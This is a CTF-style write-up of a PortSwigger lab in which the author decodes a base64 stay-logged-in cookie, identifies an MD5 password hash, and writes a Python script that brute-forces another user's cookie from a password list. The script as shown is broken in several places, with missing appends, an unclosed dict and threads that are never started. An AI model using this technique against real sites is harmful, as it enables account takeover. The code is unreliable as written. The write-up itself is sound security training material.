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Brute-forcing a stay-logged-in cookie | Dec 22, 2022


Welcome to my another writeup! In this Portswigger Labs lab, you'll learn: Brute-forcing a stay-logged-in cookie! Without further ado, let's dive in.


This lab allows users to stay logged in even after they close their browser session. The cookie used to provide this functionality is vulnerable to brute-forcing.

To solve the lab, brute-force Carlos's cookie to gain access to his "My account" page.


Login page:

In here, we can see that there is a Stay logged in checkbox.

Let's try to login as user wiener:

When we click the Log in button, it'll send a POST request to /login, with parameter username, password, and stay-logged-in.

Also, it sets a new cookie called stay-logged-in, and the value looks like is base64 encoded!

Let's try to base64 decode that:

└─# echo "d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw" | base64 -d

Hmm… Looks like the format is username:password_hash.

And that hash seems to be MD5. Let's use hash-identifier to verify that:

└─# hash-identifier '51dc30ddc473d43a6011e9ebba6ca770' 
Possible Hashs:
[+] MD5

Yep, it's MD5 hash.

How about cracking it?

An online tool called CrackStation may help us:

Nice! The MD5 hash is the wiener's password!

Armed with above information, we can try to brute force user carlos password!

To do so, I'll write a python script:

#!/usr/bin/env python3

import requests
from threading import Thread
from time import sleep
from hashlib import md5
from base64 import b64encode

def fetchPassword(filename):
    listStayloggedinCookie = list()

    with open(filename) as fd:
        for line in fd:
            password = line.strip().encode('utf-8')
            MD5Hash = md5(password).hexdigest()
            base64Encoded = b64encode(f'carlos:{MD5Hash}'.encode('utf-8'))


    return listStayloggedinCookie

def sendRequest(url, cookieValue):
    cookie = {
        'session': 'h826pmhwmUE0tzA8p8tCgCh41CmBJTrU',
        'stay-logged-in': cookieValue

    myaccountRequestText = requests.get(url, cookies=cookie).text

    if 'Log in' not in myaccountRequestText:
        print(f'[+] Found cookie: {cookieValue}')

def main():
    url = ''

    passwordFileName = './auth_password.txt'
    listStayloggedinCookie = fetchPassword(passwordFileName)

    for cookieValue in listStayloggedinCookie:
        thread = Thread(target=sendRequest, args=(url, cookieValue.decode('ascii')))

if __name__ == '__main__':
└─# python3
[+] Found cookie: Y2FybG9zOjBhY2Y0NTM5YTE0YjNhYTI3ZGVlYjRjYmRmNmU5ODlm

Let's change our stay-logged-in cookie value to that:

Then go to /my-account:

We're user carlos!

What we've learned:

  1. Brute-forcing a stay-logged-in cookie